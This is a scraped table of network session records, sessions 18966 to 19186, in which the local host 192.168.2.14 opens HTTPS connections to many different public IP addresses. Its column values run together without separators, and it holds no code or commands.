                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18966192.168.2.1440754203.216.248.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18967192.168.2.1437418158.199.190.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18968192.168.2.1433598174.240.209.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18969192.168.2.1455846220.182.164.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18970192.168.2.1453966125.139.187.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18971192.168.2.1458112103.45.127.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18972192.168.2.1437330200.237.187.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18973192.168.2.145374694.252.219.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18974192.168.2.1454892144.70.236.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18975192.168.2.145888262.144.30.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18976192.168.2.1433462157.29.203.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18977192.168.2.1447204151.128.0.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18978192.168.2.1439392218.87.159.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18979192.168.2.143840294.83.112.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18980192.168.2.1457536121.240.139.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18981192.168.2.1438490165.16.90.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18982192.168.2.144623087.123.209.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18983192.168.2.146021024.161.239.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18984192.168.2.145162093.181.16.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18985192.168.2.1442530174.32.248.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18986192.168.2.145319673.43.181.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18987192.168.2.145573837.228.27.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18988192.168.2.1439426132.216.7.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18989192.168.2.1442686211.227.188.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18990192.168.2.1454470126.88.76.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18991192.168.2.144855217.239.243.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18992192.168.2.144269676.172.79.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18993192.168.2.143953682.237.253.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18994192.168.2.14402729.6.132.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18995192.168.2.1455816110.102.218.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18996192.168.2.144459624.217.249.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18997192.168.2.145044850.53.53.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18998192.168.2.1435268177.86.116.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18999192.168.2.1433672133.102.138.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19000192.168.2.1451426130.69.161.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19001192.168.2.1438848209.210.233.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19002192.168.2.143313051.181.139.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19003192.168.2.144718213.208.84.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19004192.168.2.1436160141.236.229.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19005192.168.2.144137659.126.248.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19006192.168.2.144436088.213.186.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19007192.168.2.145689425.12.58.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19008192.168.2.1441410172.114.110.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19009192.168.2.1434804117.198.91.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19010192.168.2.143563012.212.77.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19011192.168.2.144576467.56.144.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19012192.168.2.1441416130.230.61.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19013192.168.2.14474844.249.213.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19014192.168.2.145267693.10.37.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19015192.168.2.145061084.76.186.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19016192.168.2.144881480.105.177.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19017192.168.2.1448646128.34.191.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19018192.168.2.1459072212.62.24.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19019192.168.2.14510364.144.104.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19020192.168.2.1448978121.178.110.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19021192.168.2.1433062109.211.102.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19022192.168.2.144535692.7.70.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19023192.168.2.145643870.90.80.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19024192.168.2.144961453.34.30.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19025192.168.2.143718019.229.175.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19026192.168.2.1449892217.161.10.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19027192.168.2.1447498133.40.164.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19028192.168.2.1437606207.55.46.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19029192.168.2.1439542103.197.40.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19030192.168.2.1441550184.169.130.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19031192.168.2.145526642.53.199.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19032192.168.2.1448144118.24.199.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19033192.168.2.1433646171.34.201.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19034192.168.2.1451232194.43.186.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19035192.168.2.1446536132.191.80.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19036192.168.2.145247653.227.250.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19037192.168.2.1453204128.244.103.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19038192.168.2.1436354210.164.84.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19039192.168.2.1453130117.207.211.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19040192.168.2.1437458207.0.24.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19041192.168.2.1459382168.108.241.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19042192.168.2.144696853.242.121.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19043192.168.2.1439114185.97.108.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19044192.168.2.144099876.138.122.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19045192.168.2.1459984117.236.240.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19046192.168.2.144452275.226.0.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19047192.168.2.1438148140.81.123.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19048192.168.2.1450196159.54.136.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19049192.168.2.143645889.197.3.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19050192.168.2.1434314145.71.230.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19051192.168.2.144143259.66.224.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19052192.168.2.145046874.29.200.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19053192.168.2.1440758174.154.63.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19054192.168.2.1440166170.123.65.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19055192.168.2.1454994185.248.8.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19056192.168.2.1444030113.135.136.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19057192.168.2.143360058.187.246.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19058192.168.2.144352050.181.14.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19059192.168.2.1456252176.147.240.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19060192.168.2.1459266137.249.26.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19061192.168.2.1447984146.227.43.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19062192.168.2.1452206216.94.11.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19063192.168.2.1435684110.159.60.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19064192.168.2.145368282.154.206.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19065192.168.2.1432878196.16.36.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19066192.168.2.1448234107.58.187.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19067192.168.2.145035085.6.91.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19068192.168.2.1446734205.98.203.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19069192.168.2.146046297.195.220.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19070192.168.2.143913695.65.11.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19071192.168.2.1433188129.36.174.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19072192.168.2.1456060151.153.64.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19073192.168.2.14415805.70.26.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19074192.168.2.144303846.36.168.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19075192.168.2.14446689.61.225.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19076192.168.2.143354419.155.25.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19077192.168.2.143645627.124.242.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19078192.168.2.1436802220.31.202.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19079192.168.2.146016013.78.238.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19080192.168.2.145009836.90.244.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19081192.168.2.144502447.36.234.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19082192.168.2.1448306183.120.58.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19083192.168.2.145844250.14.87.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19084192.168.2.1435818182.49.242.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19085192.168.2.1454206141.102.63.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19086192.168.2.144847295.152.66.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19087192.168.2.144055651.105.148.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19088192.168.2.144714288.30.189.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19089192.168.2.144043288.5.5.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19090192.168.2.14488981.239.93.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19091192.168.2.143315682.94.249.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19092192.168.2.1452756135.212.26.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19093192.168.2.144647284.130.129.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19094192.168.2.143841019.94.206.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19095192.168.2.1448060157.82.241.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19096192.168.2.1460868101.176.141.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19097192.168.2.1450582117.126.99.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19098192.168.2.144434889.183.163.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19099192.168.2.145607671.33.94.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19100192.168.2.1453964158.114.138.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19101192.168.2.1437334198.91.66.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19102192.168.2.1435680130.168.177.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19103192.168.2.1438500208.65.18.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19104192.168.2.1452110157.237.218.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19105192.168.2.1438290183.21.67.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19106192.168.2.144584098.19.253.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19107192.168.2.1449838170.19.147.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19108192.168.2.1450162189.230.88.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19109192.168.2.1432908164.147.95.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19110192.168.2.1444666134.106.98.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19111192.168.2.145990073.4.154.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19112192.168.2.143299614.151.142.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19113192.168.2.1437642174.20.176.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19114192.168.2.1455606194.104.126.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19115192.168.2.143328257.229.76.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19116192.168.2.14362585.191.255.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19117192.168.2.1443462120.34.68.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19118192.168.2.1459114148.255.152.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19119192.168.2.14520489.138.76.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19120192.168.2.143299092.29.221.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19121192.168.2.145460439.248.17.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19122192.168.2.1444502132.144.254.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19123192.168.2.1446972123.169.175.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19124192.168.2.1455814221.120.225.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19125192.168.2.143860491.124.161.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19126192.168.2.146061042.26.193.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19127192.168.2.1439864108.24.162.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19128192.168.2.143942853.245.131.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19129192.168.2.1444484106.215.79.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19130192.168.2.1440940165.61.49.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19131192.168.2.1435166207.22.229.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19132192.168.2.1449842180.209.19.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19133192.168.2.146031043.245.246.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19134192.168.2.1438020184.119.236.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19135192.168.2.145366449.223.141.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19136192.168.2.1454956113.106.90.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19137192.168.2.1451574159.143.192.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19138192.168.2.143917083.66.156.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19139192.168.2.1442732217.40.172.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19140192.168.2.1443318163.91.190.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19141192.168.2.1452266218.177.82.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19142192.168.2.1434248138.167.220.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19143192.168.2.14410649.127.219.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19144192.168.2.1443236144.229.125.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19145192.168.2.1457480141.141.71.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19146192.168.2.145830249.99.203.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19147192.168.2.1460148205.67.178.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19148192.168.2.14464164.105.142.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19149192.168.2.1444472177.127.0.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19150192.168.2.144354059.56.133.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19151192.168.2.1456648148.76.203.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19152192.168.2.1440046175.142.94.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19153192.168.2.1438348155.39.7.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19154192.168.2.145004869.218.53.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19155192.168.2.1449410188.102.54.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19156192.168.2.144110837.154.194.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19157192.168.2.1458136169.85.181.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19158192.168.2.1441412157.54.180.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19159192.168.2.1450362135.88.66.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19160192.168.2.144652072.228.79.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19161192.168.2.1438340135.112.40.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19162192.168.2.144532648.118.56.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19163192.168.2.143608051.180.244.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19164192.168.2.1455142137.24.167.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19165192.168.2.144490419.190.88.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19166192.168.2.1451462102.82.4.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19167192.168.2.145272249.86.187.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19168192.168.2.1457372128.11.221.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19169192.168.2.1438936204.43.157.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19170192.168.2.1457038182.95.216.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19171192.168.2.145093658.72.228.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19172192.168.2.1435238183.4.142.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19173192.168.2.1448902186.96.172.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19174192.168.2.1454520179.45.210.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19175192.168.2.1450770118.129.57.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19176192.168.2.1457316114.56.146.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19177192.168.2.143946488.35.122.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19178192.168.2.145561461.1.95.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19179192.168.2.1445060155.246.91.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19180192.168.2.145772493.203.139.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19181192.168.2.1437250212.107.215.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19182192.168.2.1433084162.57.183.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19183192.168.2.145538452.196.181.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19184192.168.2.1443728113.231.56.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19185192.168.2.1443532134.75.122.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19186192.168.2.1455360166.119.66.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
